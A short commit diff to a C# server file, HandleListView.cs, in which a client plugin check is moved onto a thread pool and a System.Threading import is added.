Update HandleListView.cs

This commit is contained in:
NYAN CAT 2019-10-09 17:51:04 +03:00
parent 65f60c29ff
commit 82d9f3b2d3

View File

@ -4,6 +4,7 @@ using Server.Connection;
using cGeoIp;
using System.Drawing;
using System.Windows.Forms;
using System.Threading;
namespace Server.Handle_Packet
{
@ -32,7 +33,7 @@ namespace Server.Handle_Packet
try
{
client.CheckPlugin();
ThreadPool.QueueUserWorkItem(client.CheckPlugin);
}
catch { }